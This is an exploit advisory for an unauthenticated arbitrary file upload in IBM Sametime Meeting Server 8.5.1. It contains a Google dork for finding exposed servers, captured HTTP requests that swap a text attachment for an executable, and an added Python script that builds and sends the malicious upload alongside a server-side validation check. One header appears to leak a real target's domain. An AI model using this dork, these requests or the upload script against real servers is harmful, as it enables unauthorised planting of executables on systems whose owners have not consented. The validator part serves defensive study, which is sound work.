IBM Sametime Meeting Server Arbitrary File Upload
Posted on 01 July 2014
[+] Exploit Title: IBM Sametime Meeting Server Arbitrary File Upload
[+] Google Dork: intitle:"Nova reunião - IBM Lotus Sametime" (Portuguese: "New meeting - IBM Lotus Sametime")
[+] Date: 26/06/2014
[+] Exploit Author: Adriano Marcio Monteiro
[+] E-mail Author: adrianomarciomonteiro@gmail.com
[+] Blog Author: http://adrianomarciomonteiro.blogspot.com.br
[+] Vendor Homepage: http://www.ibm.com/us/en/
[+] Software Link: http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent
[+] Version: 8.5.1
[+] Tested on: Windows 7 SP1 x86 pt-br
[+] CVE-ID : Waiting
[+] OSVDB-ID: Waiting

IBM Sametime Meeting Server allows anonymous users to upload arbitrary files as meeting attachments by changing the filename and Content-Type of the file part in the multipart POST. The file type restriction is enforced only on the client side, in the browser; the server does not repeat the check, so anyone who intercepts the request (for example with a local proxy) and edits the file part can attach a file of any type to the meeting document identified by MeetingDocID. In the PoC below, the only difference between the two requests is that the file part's filename changes from OWNED.txt to OWNED.exe and its Content-Type from text/plain to application/octet-stream.

PoC - Proof of Concept

http://sametime02.myserver.com.br/stconf.nsf/frmConference?OpenForm

/* ---------- Original Request ---------- */

POST /stconf.nsf/wAttach?OpenForm&Seq=1&5F1BF7DE56F68DA583257D040071276C0 HTTP/1.1
Host: sametime02.myserver.com.br
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://sametime02.myserver.com.br/stconf.nsf/wAttach?OpenForm&5F1BF7DE56F68DA583257D040071276C0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16704454925606
Content-Length: 729

-----------------------------16704454925606
Content-Disposition: form-data; name="__Click"

0
-----------------------------16704454925606
Content-Disposition: form-data; name="MeetingDocID"

5F1BF7DE56F68DA583257D040071276C
-----------------------------16704454925606
Content-Disposition: form-data; name="AttachFlag"

1
-----------------------------16704454925606
Content-Disposition: form-data; name="AttachList"

Sem Anexos
-----------------------------16704454925606
Content-Disposition: form-data; name="%%File.832578a70066c5a9.116f49cec1616cad85257134007343d5.$Body.0.3206"; filename="OWNED.txt"
Content-Type: text/plain

OWNED BY ADRIANO MARCIO MONTEIRO
-----------------------------16704454925606--

/* ---------- Content Modified ---------- */

POST /stconf.nsf/wAttach?OpenForm&Seq=1&5F1BF7DE56F68DA583257D040071276C0 HTTP/1.1
Host: sametime02.myserver.com.br
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://sametime02.bancobmg.com.br/stconf.nsf/wAttach?OpenForm&5F1BF7DE56F68DA583257D040071276C0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16704454925606
Content-Length: 729

-----------------------------16704454925606
Content-Disposition: form-data; name="__Click"

0
-----------------------------16704454925606
Content-Disposition: form-data; name="MeetingDocID"

5F1BF7DE56F68DA583257D040071276C
-----------------------------16704454925606
Content-Disposition: form-data; name="AttachFlag"

1
-----------------------------16704454925606
Content-Disposition: form-data; name="AttachList"

Sem Anexos
-----------------------------16704454925606
Content-Disposition: form-data; name="%%File.832578a70066c5a9.116f49cec1616cad85257134007343d5.$Body.0.3206"; filename="OWNED.exe"
Content-Type: application/octet-stream

...EXE Content...
-----------------------------16704454925606--
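The following script is an added example and is not part of the advisory or of IBM's code. It builds the multipart POST shown above with the file part's filename and Content-Type swapped, recomputes Content-Length, and, for contrast, shows the kind of server-side check (an extension allow-list, a declared-type match and a magic-byte sniff) that would have rejected the modified request. The host, path, MeetingDocID, boundary and field name are copied from the captured request; the "executable" bytes are a constructed MZ header, not a real program, and the allow-list policy is a hypothetical one.

```python
"""Added example, not code from the advisory: builds the multipart POST
from the PoC with the file part's filename and Content-Type swapped, and
shows the server-side check that would have rejected it.  HOST, PATH,
MEETING_DOC_ID, BOUNDARY and FIELD_NAME are copied from the captured
request; FAKE_EXE and ALLOWED_TYPES are constructed for the example."""
import http.client
import os

HOST = "sametime02.myserver.com.br"
MEETING_DOC_ID = "5F1BF7DE56F68DA583257D040071276C"
PATH = "/stconf.nsf/wAttach?OpenForm&Seq=1&" + MEETING_DOC_ID + "0"
FIELD_NAME = ("%%File.832578a70066c5a9."
              "116f49cec1616cad85257134007343d5.$Body.0.3206")
# Firefox-style boundary: 27 dashes plus digits in the header,
# "--" + boundary at the start of every part in the body.
BOUNDARY = "-" * 27 + "16704454925606"
# Constructed stand-in for "...EXE Content...": an MZ header, nothing more.
FAKE_EXE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00"


def build_body(filename, content_type, data, boundary=BOUNDARY):
    """Return the multipart/form-data body as bytes.  Only the last part,
    the file, differs between the original and the modified request."""
    b = ("--" + boundary).encode()
    crlf = b"\r\n"
    out = b""
    for name, value in (("__Click", "0"), ("MeetingDocID", MEETING_DOC_ID),
                        ("AttachFlag", "1"), ("AttachList", "Sem Anexos")):
        out += b + crlf
        out += b'Content-Disposition: form-data; name="%s"' % name.encode()
        out += crlf + crlf + value.encode() + crlf
    out += b + crlf
    out += (b'Content-Disposition: form-data; name="%s"; filename="%s"'
            % (FIELD_NAME.encode(), filename.encode())) + crlf
    out += b"Content-Type: " + content_type.encode() + crlf + crlf
    out += data + crlf
    out += b + b"--" + crlf
    return out


def build_headers(body, boundary=BOUNDARY, host=HOST):
    """Request headers.  Content-Length is computed from the body rather
    than copied: the advisory's modified request still says 729 although
    the executable payload is a different size."""
    return {
        "Host": host,
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:29.0) "
                      "Gecko/20100101 Firefox/29.0",
        "Referer": "http://%s/stconf.nsf/wAttach?OpenForm&%s0"
                   % (host, MEETING_DOC_ID),
        "Content-Type": "multipart/form-data; boundary=" + boundary,
        "Content-Length": str(len(body)),
    }


def upload(filename, content_type, data, host=HOST, timeout=15):
    """Send the POST over plain HTTP, as the advisory's target used.
    Only run this against a server you are authorised to test."""
    body = build_body(filename, content_type, data)
    conn = http.client.HTTPConnection(host, timeout=timeout)
    conn.request("POST", PATH, body=body,
                 headers=build_headers(body, host=host))
    resp = conn.getresponse()
    return resp.status, resp.read()


# What the server should do instead of trusting the browser: allow-list
# the extension, require the declared type to match it, and sniff the
# content for executable signatures.  Hypothetical policy, not IBM's.
ALLOWED_TYPES = {
    ".txt": {"text/plain"},
    ".pdf": {"application/pdf"},
    ".png": {"image/png"},
}
EXECUTABLE_MAGIC = (b"MZ", b"\x7fELF", b"\xca\xfe\xba\xbe", b"\xfe\xed\xfa")


def server_side_accept(filename, content_type, data):
    """Return True only for an upload that passes every server-side check."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_TYPES:
        return False
    declared = content_type.split(";")[0].strip().lower()
    if declared not in ALLOWED_TYPES[ext]:
        return False
    if any(data.startswith(m) for m in EXECUTABLE_MAGIC):
        return False
    return True


if __name__ == "__main__":
    body = build_body("OWNED.exe", "application/octet-stream", FAKE_EXE)
    print(body.decode("latin-1"))
    for args in (("OWNED.txt", "text/plain", b"OWNED"),
                 ("OWNED.exe", "application/octet-stream", FAKE_EXE),
                 ("OWNED.txt", "text/plain", FAKE_EXE)):
        print(args[0], args[1], "->", server_side_accept(*args))
```

Running the script prints the modified request body and then the verdict of the server-side check for three cases: the original text upload (accepted), the renamed executable from the PoC (rejected on extension and type), and an executable smuggled under a .txt name with a text/plain type (rejected by the magic-byte sniff, which is why the check must look at content and not only at what the client declares). Note that a hand-built request must recompute Content-Length for the real payload; an intercepting proxy normally does this for you, which is why the advisory's modified request could keep the original value of 729.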
